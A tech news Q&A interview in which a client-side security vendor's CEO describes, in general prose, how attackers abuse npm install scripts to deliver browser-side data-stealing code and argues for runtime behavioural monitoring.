How attackers are weaponizing open-source package managers [Q&A]

IP data theft

A new wave of attacks is hitting the JavaScript package ecosystem, specifically through open-source managers like NPM. Instead of malicious code hiding in the package itself, attackers now weaponize the install process. So, the code looks clean at build-time but later executes in end-user browsers, where it quietly steals data.

We talked to Simon Wijckmans, CEO at the client-side security and intelligence platform cside, to understand why this is happening and how organizations can respond.

BN: Why are attackers shifting from malicious packages to weaponizing the NPM install process, and what makes this tactic so effective?

SW: Attackers are realizing that patience can pay off better than brute force. So instead of creating malicious packages that are obviously malicious (and that security scanners can flag immediately), they’re now targeting the npm install process itself, with install scripts that look completely innocuous.

What makes this all particularly effective is timing. These scripts activate during the build process. They make a simple network request to fetch what appears to be legitimate JavaScript code. So, your security team has already scanned the package, found nothing suspicious, and moved on. But the moment your application builds and ships to production…boom, that innocuous code transforms. It injects new script tags directly into your users’ browsers, creating a backdoor that traditional security tools never saw coming.

BN: How do these attacks manage to bypass traditional security scanning and monitoring, and why are client-side environments such a blind spot?

SW: The attacks bypass security by exploiting fundamental design flaws in how most security tools work. SAST solutions won’t help here because the code only activates during builds. Snyk and similar tools flag known vulnerabilities, but that’s irrelevant when the malicious payload downloads dynamically. Web application firewalls monitor server traffic beautifully, but they’re blind to client-side execution.

In short, client-side environments are a blind spot because JavaScript delivery is dynamic by design. Suppose you are using a marketing tool that might serve different script versions based on browser type or user location. That’s normal behavior, but it’s also the perfect opportunity for attackers. They leverage these same dynamics to avoid detection, serving malicious code only to real users while security tools see nothing wrong.

BN: What's the scale of potential impact? Are we talking hundreds of sites or hundreds of thousands?

SW: We’re talking hundreds of thousands of websites, at minimum, potentially running compromised code right now through popular services. Most security teams have absolutely no idea because they’re looking in all the wrong places.

When a single compromised package can affect that many websites simultaneously, the financial carnage multiplies exponentially. IBM’s recent research puts the average data breach at $4.4 million, but supply chain attacks like these carry premium price tags due to their extensive reach and complex remediation requirements. This isn’t a targeted attack on a single company, but a blast radius that can span entire ecosystems.

BN: How should enterprises reframe their security strategies when the real danger begins only after code ships to the browser?

SW: Enterprises need a fundamental shift in perspective. There’s still a dangerous assumption that scanning for what malicious code looks like is sufficient. But modern npm attacks don’t play by those rules. They create attack chains that phase-shift across environments, appearing harmless at each checkpoint while building toward devastating endpoints.

The solution requires moving from static scanning to behavioral analysis. Instead of only scanning for malicious code signatures, security teams need systems that monitor what malicious code actually does. So when a seemingly innocent analytics script suddenly starts accessing payment forms or making unauthorized network requests, you need intelligent systems that can detect and block that activity before any damage occurs.

You also cannot rely on crawlers or agents alone. Those tools are easily bypassed because attackers can detect them and serve clean code. You need to intercept and inspect the actual JavaScript that real users receive (not what your security crawler sees). Security simply cannot end when code ships, because it’s become very clear that’s actually when the real monitoring needs to begin.

BN: Do these attacks represent a new phase in supply-chain exploitation similar in significance to the high-profile SolarWinds or Log4j attacks?

SW: I’d argue these attacks make the SolarWinds attack look almost quaint by comparison. What we’re seeing represents more than isolated security failures, but a shift in how attackers think about supply chain exploitation. Threat actors are now building attack chains designed specifically to evade detection at every traditional checkpoint and exploiting the gaps between development-time security scanning and runtime execution. As software development becomes increasingly dependent on complex package ecosystems and intricate build processes, these gaps are only widening. This is absolutely an accelerating arms race.

BN: What kinds of monitoring or detection approaches actually work against dynamically-assembled, runtime threats like this?

SW: Traditional security approaches assume a linear attack model where malicious code gets written, distributed, and executed in predictable ways. These attacks don’t follow those assumptions, so you need monitoring that doesn’t either.

The key is that you cannot rely on tools that attackers can easily detect and bypass. Crawlers, for example, are fundamentally flawed for this purpose (they visit from cloud provider IPs, and attackers can serve them clean code while delivering malicious payloads to real users). When the Polyfill attack happened last year, it took threat intelligence vendors over 30 hours to flag it, even with widespread press coverage. By that time, the damage was done.

What actually works is intercepting the real JavaScript that users receive and analyzing it in real-time. You need to establish baselines for normal behavior and immediately flag deviations (such as when code starts accessing sensitive data, making unauthorized network calls, or injecting unexpected elements into the DOM).

The critical difference is between a strategy that, well, hopes malicious code will trigger their traps versus systems that actually inspect the payload before it executes. Comprehensive monitoring across the entire application lifecycle is essential, not just at build time or just on the server. You need visibility into what’s actually executing in users’ browsers, because that’s where these attacks ultimately succeed or fail.

BN: Looking ahead, what changes do you expect in attacker behavior as they continue to exploit gaps between development, build, and runtime environments?

SW: Attackers have discovered that the gaps between development, build, and runtime create perfect hiding spots for sophisticated threats. I expect we’ll see increasingly sophisticated attack chains that are even more distributed across these environments, making them harder to detect with any single tool or approach.

We’ll likely see more and more headline-triggering attacks that look completely legitimate at every individual checkpoint but assemble into something malicious only when all the pieces come together in the browser. Attackers will continue exploiting the fact that most security teams still think in silos (e.g. development security, infrastructure security, application security) rather than thinking about the entire execution chain.

They’ll also continue to exploit the dynamic nature of JavaScript delivery. As security tools try to keep up, attackers will get better at fingerprinting non-human requests and serving them clean code. It’s going to become an ever-more-sophisticated cat-and-mouse game.

But I strongly believe security teams that recognize this evolution now and implement comprehensive monitoring across the full lifecycle (with systems that can’t be easily detected and bypassed) will have a significant advantage. They’ll be able to detect threats that bypass every traditional security tool and protect customers when their competitors cannot. That said, the window to get ahead of this is closing fast.

Image credit: nomadsoul1/depositphotos.com

Why Trust Us

At BetaNews.com, we don't just report the news: We live it. Our team of tech-savvy writers is dedicated to bringing you breaking news, in-depth analysis, and trustworthy reviews across the digital landscape.

© 1998-2026 BetaNews, Inc. All Rights Reserved.